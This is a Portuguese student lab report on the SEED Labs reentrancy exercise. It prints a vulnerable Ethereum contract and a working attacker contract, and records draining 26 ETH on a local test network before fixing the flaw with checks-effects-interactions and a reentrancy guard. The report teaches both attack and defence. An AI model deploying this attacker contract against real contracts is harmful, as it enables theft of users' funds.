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Report: Smart Contract Reentrancy Attack Lab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resolução completa do laboratório de Reentrancy Attack dos SEED Labs. O laboratório teve como objetivo explorar uma vulnerabilidade crítica em smart contracts Ethereum através da implementação prática de um ataque de reentrancy, análise do seu funcionamento, e posterior correção da vulnerabilidade.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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">O ataque de reentrancy ficou mundialmente conhecido após o ataque à DAO em 2016, onde mais de 150 milhões de dólares foram roubados, levando ao hard fork que criou o Ethereum Classic. Esta vulnerabilidade continua relevante, sendo explorada regularmente no ecossistema Ethereum.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Configuração do Ambiente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2.1 Setup Inicial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Iniciamos extraindo os arquivos do laboratório e preparando o emulador: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unzip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Labsetup.zip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Labsetup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dcbuild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Aguardamos a inicialização completa do emulador. Durante este período, os nós Ethereum foram configurados usando o protocolo Proof-of-Authority (PoA).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2.2 Verificação do Ambiente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inicialização, acessamos o EtherView em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http://localhost:5000/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confirmar que a blockchain estava operacional.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Instalamos as dependências Python necessárias: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web3==5.31.1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2.3 Teste de Conexão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Realizamos um teste de conexão com o nó Ethereum (conforme indicado no ficheiro cripto.txt, o IP usado foi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10.151.0.71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SEEDWeb3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web3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SEEDWeb3.connect_to_geth_poa(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'http://10.151.0.71:8545'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(web3.isConnected())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Retorna True se conectado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Desbloqueamos uma conta para realizar transações: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sender_account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web3.eth.accounts[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web3.geth.personal.unlockAccount(sender_account,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Verificamos o saldo da conta selecionada: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web3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web3.eth.accounts[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web3.eth.get_balance(Web3.toChecksumAddress(address))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f"Saldo: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fromWei(balance,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'ether'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 ETH"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conta selecionada (accounts[1]) tinha saldo suficiente para as operações do laboratório.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 Task 1: Deploy e Análise do Contrato Vulnerável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3.1 Análise do Código Fonte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Examinamos o contrato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ReentrancyVictim.sol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fornecido no laboratório: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 solidity ^0.6.8;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ReentrancyVictim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mapping (address =&gt; uint) public balances;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deposit() public payable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balances[msg.sender] += msg.value;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withdraw(uint _amount) public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require(balances[msg.sender] &gt;= _amount);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(bool sent, ) = msg.sender.call{value: _amount}("");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require(sent, "Failed to send Ether");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balances[msg.sender] -= _amount;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getBalance(address _addr) public view returns (uint)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balances[_addr];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getContractBalance() public view returns (uint)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address(this).balance;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da Vulnerabilidade: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função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observamos que: 1. Linha 11: Verifica se o usuário tem saldo suficiente 2. Linha 12: Envia Ether usando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baixo nível 3. Linha 14: Atualiza o saldo interno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vulnerabilidade está clara: o saldo é atualizado APÓS o envio do Ether. Durante a execução de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controle é transferido para o endereço de destino, permitindo que código malicioso seja executado antes da atualização do saldo.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3.2 Compilação do Contrato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Compilamos o contrato usando Solidity 0.6.8 (versão vulnerável):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/Labsetup/contract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solc-0.6.8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--overwrite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--abi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--bin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ReentrancyVictim.sol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compilação foi bem-sucedida, gerando os arquivos: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ReentrancyVictim.bin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Bytecode do contrato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ReentrancyVictim.abi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Interface JSON do contrato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3.3 Deploy do Contrato Vítima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Executamos o script de deploy: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/Labsetup/victim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deploy_victim_contract.py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script retornou o endereço do contrato implantado. Este endereço foi guardado para uso nas próximas etapas, sendo necessário para todas as interações futuras com o contrato vítima.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3.4 Financiamento do Contrato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Editamos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fund_victim_contract.py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o endereço do contrato e alteramos a quantidade para 30 ETH conforme solicitado pela task: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victim_addr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'&lt;ENDEREÇO_DO_CONTRATO_VÍTIMA&gt;'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Executamos o script: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fund_victim_contract.py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transação foi processada e incluída num bloco. Verificamos o saldo do contrato usando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get_balance.py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confirmando que o contrato vítima tinha 30 ETH depositados.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3.5 Teste de Retirada Normal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Testamos a função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condições normais. Editamos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withdraw_from_victim_contract.py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victim_addr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'&lt;ENDEREÇO_DO_CONTRATO_VÍTIMA&gt;'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Executamos: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withdraw_from_victim_contract.py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retirada foi bem-sucedida. O script mostrou o saldo atualizado da conta após a transação. Verificando o saldo do contrato, confirmamos que tinha 25 ETH restantes (30 - 5).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retirada funcionou corretamente em uso legítimo, confirmando que o contrato opera normalmente quando não explorado.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Task 2: Deploy do Contrato Atacante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4.1 Análise do Contrato de Ataque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Analisamos o contrato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ReentrancyAttacker.sol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fornecido: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 solidity ^0.6.8;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"./ReentrancyVictim.sol";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ReentrancyAttacker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ReentrancyVictim public victim;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address payable _owner;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constructor(address payable _addr) public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victim = ReentrancyVictim(_addr);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_owner = payable(msg.sender);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fallback() external payable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if(address(victim).balance &gt;= 1 ether)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victim.withdraw(1 ether);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attack() external payable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require(msg.value &gt;= 1 ether, "You need to send one ether when attacking");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victim.deposit{value: 1 ether}();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victim.withdraw(1 ether);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getBalance() public view returns (uint)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address(this).balance;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cashOut(address payable _addr) external payable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require(msg.sender == _owner);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_addr.transfer(address(this).balance);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Compreensão do Mecanismo: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função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 chave do ataque. Quando o contrato atacante recebe Ether da vítima (durante a execução de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esta função é automaticamente invocada. Ela verifica se a vítima ainda tem saldo e, em caso afirmativo, chama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novamente, criando um ciclo recursivo.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4.2 Compilação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Compilamos o contrato atacante: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/Labsetup/contract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solc-0.6.8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--overwrite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--abi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--bin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ReentrancyAttacker.sol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Compilação bem-sucedida, gerando os arquivos necessários.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4.3 Deploy do Contrato Atacante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Editamos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deploy_attack_contract.py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o endereço do contrato vítima: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victim_addr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'&lt;ENDEREÇO_DO_CONTRATO_VÍTIMA&gt;'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Executamos o deploy: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/Labsetup/attacker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deploy_attack_contract.py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contrato atacante foi implantado com sucesso. Anotamos o endereço retornado para uso na próxima fase.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5. Task 3: Execução do Ataque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5.1 Preparação do Ataque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Editamos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launch_attack.py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o endereço do contrato atacante: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attacker_addr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'&lt;ENDEREÇO_DO_CONTRATO_ATACANTE&gt;'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pré-ataque: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Contrato vítima: 25 ETH - Contrato atacante: 0 ETH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5.2 Execução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Lançamos o ataque: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launch_attack.py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transação foi processada e incluída num bloco. O consumo de gas foi significativamente alto devido às múltiplas chamadas recursivas executadas durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="bookmark=id.xstd5tywg75e" w:id="0"/>
    <w:bookmarkEnd w:id="0"/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5.3 Verificação dos Resultados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Verificamos os saldos após o ataque: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get_balance.py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Resultados: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Saldo Antes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Saldo Depois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 Vítima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ETH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ETH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 Atacante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ETH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ETH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ataque foi totalmente bem-sucedido! O contrato atacante drenou não apenas os 25 ETH que estavam no contrato, mas também o 1 ETH que ele próprio depositou inicialmente.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5.4 Análise no EtherView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Consultamos o EtherView para analisar a transação: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transação mostrava múltiplas chamadas internas (traces)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número de iterações recursivas correspondeu ao saldo disponível (26 ETH = 1 depositado + 25 existentes)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retirada de 1 ETH gerou uma nova chamada recursiva até o contrato ficar sem fundos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5.5 Cash Out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Executamos o cash out dos fundos roubados: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cashout.py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transação foi bem-sucedida, transferindo os 26 ETH do contrato atacante para a conta pessoal do atacante.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6. Análise Técnica do Ataque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6.1 Sequência de Execução Observada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Através dos logs da blockchain e análise do gas usado, reconstruímos a sequência de eventos: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Iteração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attack() é chamada com 1 ETH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victim.deposit(1 ETH) → saldo interno do atacante = 1 ETH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victim.withdraw(1 ETH) é chamada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a. require(balances[attacker] &gt;= 1) → PASSA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b. attacker.call{value: 1 ether} → transfere 1 ETH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 fallback() é acionada no contrato atacante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d. fallback() verifica: victim.balance &gt;= 1 ETH → VERDADEIRO (ainda tem 25 ETH)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e. fallback() chama victim.withdraw(1 ETH) novamente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Iterações 2-25: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mesmo ciclo se repete. Em cada iteração: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verificação de saldo PASSA porque balances[attacker] nunca foi decrementado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 ETH é enviado ao atacante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fallback() é acionada e chama withdraw() novamente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Iteração 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victim.withdraw(1 ETH) é chamada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require(balances[attacker] &gt;= 1) → PASSA (ainda registra 1 ETH)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attacker.call{value: 1 ether} → transfere o último 1 ETH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fallback() é acionada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fallback() verifica: victim.balance &gt;= 1 ETH → FALSO (saldo = 0)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fallback() NÃO chama withdraw() novamente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Retorna ao withdraw() original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balances[attacker] -= 1 → finalmente atualiza para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6.2 Por Que a Vulnerabilidade Existe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Identificamos três fatores críticos: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Ordem de Operações Incorreta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contrato atualiza o estado (balances) APÓS a interação externa (call)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call()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Transfere controle para o destinatário, permitindo execução de código arbitrário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Ausência de Proteção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Nenhum mecanismo impede chamadas recursivas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6.3 Diagrama da Pilha de Chamadas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└─&gt; deposit() [saldo interno: 1 ETH]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└─&gt; withdraw(1)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├─&gt; check: 1 &gt;= 1 ✓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└─&gt; call() → fallback()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└─&gt; withdraw(1)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├─&gt; check: 1 &gt;= 1 ✓ [PROBLEMA: não foi atualizado!]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└─&gt; call() → fallback()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└─&gt; withdraw(1)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├─&gt; check: 1 &gt;= 1 ✓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└─&gt; call() → fallback()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└─&gt; ... [continua 26x]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7. Task 4: Implementação de Contramedidas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7.1 Solução Implementada: Checks-Effects-Interactions Pattern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Modificamos o contrato vítima seguindo o padrão CEI (Checks-Effects-Interactions):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Original (Vulnerável):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withdraw(uint _amount) public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require(balances[msg.sender] &gt;= _amount);           // Check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(bool sent, ) = msg.sender.call{value: _amount}(""); // Interaction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require(sent, "Failed to send Ether");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balances[msg.sender] -= _amount;                    // Effect (ERRO: depois da interaction)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Corrigido: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withdraw(uint _amount) public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require(balances[msg.sender] &gt;= _amount);           // Check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balances[msg.sender] -= _amount;                    // Effect (CORRETO: antes da interaction)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(bool sent, ) = msg.sender.call{value: _amount}(""); // Interaction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require(sent, "Failed to send Ether");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7.2 Recompilação e Deploy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Recompilamos o contrato corrigido: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/Labsetup/contract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solc-0.6.8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--overwrite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--abi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--bin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ReentrancyVictim.sol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do contrato corrigido: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/Labsetup/victim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deploy_victim_contract.py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script retornou o endereço do novo contrato corrigido. Financiamos este contrato com ETH para testar se a correção previne o ataque.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7.3 Teste do Ataque no Contrato Corrigido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Atualizamos os scripts de ataque com o novo endereço e executamos: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launch_attack.py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ataque falhou! A transação foi revertida.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do Erro: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segunda tentativa de retirada recursiva: 1. O saldo já havia sido atualizado para 0 (devido à correção) 2. A tentativa de fazer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balances[attacker] -= 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o saldo é 0 causa underflow 3. Solidity 0.6.8 reverte a transação em caso de underflow aritmético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7.4 Verificação dos Saldos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tentativa de ataque falhada, verificamos que apenas 1 ETH foi retirado (o comportamento correto e esperado), enquanto o restante permaneceu seguro no contrato. A correção implementada preveniu com sucesso o ataque de reentrancy.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7.5 Outras Soluções Avaliadas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Reentrancy Guard (OpenZeppelin):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testamos uma implementação com modifier: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private locked;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 noReentrant()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require(!locked, "No reentrancy!");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locked = true;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locked = false;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withdraw(uint _amount) public noReentrant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require(balances[msg.sender] &gt;= _amount);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(bool sent, ) = msg.sender.call{value: _amount}("");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require(sent, "Failed to send Ether");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balances[msg.sender] -= _amount;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solução também foi eficaz, revertendo a transação com “No reentrancy!” na segunda tentativa de entrada.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8. Apêndices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8.1 Comandos Utilizados (Resumo)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Setup inicial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unzip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Labsetup.zip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Labsetup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dcbuild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dcup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web3==5.31.1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Compilação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contract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solc-0.6.8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--overwrite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--abi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--bin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ReentrancyVictim.sol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solc-0.6.8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--overwrite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--abi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--bin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ReentrancyAttacker.sol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Deploy e testes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../victim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deploy_victim_contract.py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fund_victim_contract.py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withdraw_from_victim_contract.py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../attacker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deploy_attack_contract.py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launch_attack.py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cashout.py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Verificações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get_balance.py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9.2 Configuração de Rede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Nó Ethereum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http://10.151.0.71:8545 (conforme cripto.txt)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Proof-of-Authority (PoA)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Interface Web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http://localhost:5000/ (EtherView)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Senha das contas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endereços específicos dos contratos deployados variam em cada execução e devem ser anotados durante o laboratório.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Conclusão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Este laboratório proporcionou uma compreensão prática e profunda sobre ataques de reentrancy em smart contracts Ethereum.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experiência reforçou vários pontos críticos sobre segurança em blockchain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Primeiro, a importância da ordem de operações em smart contracts.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Segundo, o conceito de que smart contracts são imutáveis após o deploy. Uma vez que um contrato vulnerável está na blockchain, não existe forma de corrigi-lo. No contexto de blockchain, a única solução é fazer o deploy de um novo contrato e migrar os utilizadores, o que pode ser complexo e custoso.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Terceiro, compreendemos que auditorias de segurança são absolutamente essenciais antes de colocar qualquer smart contract em produção. Estas técnicas são hoje consideradas melhores práticas na indústria e devem ser aplicadas consistentemente no desenvolvimento de smart contracts. Por fim, este laboratório destacou que a segurança em blockchain não é apenas uma questão técnica, mas também económica e social. O conhecimento sobre reentrancy attacks é fundamental para qualquer pessoa que trabalhe com smart contracts, seja como programador, auditor de segurança ou investigador.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qPnee5YabkF/hp6bBYp/iRiuA==">CgMxLjAyD2lkLnhzdGQ1dHl3Zzc1ZTgAciExYWhYbjB4V3dUdS1ZbGJGUXpxQkRweExyV3lmRjNnVm8=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2025-11-03T14:45:04Z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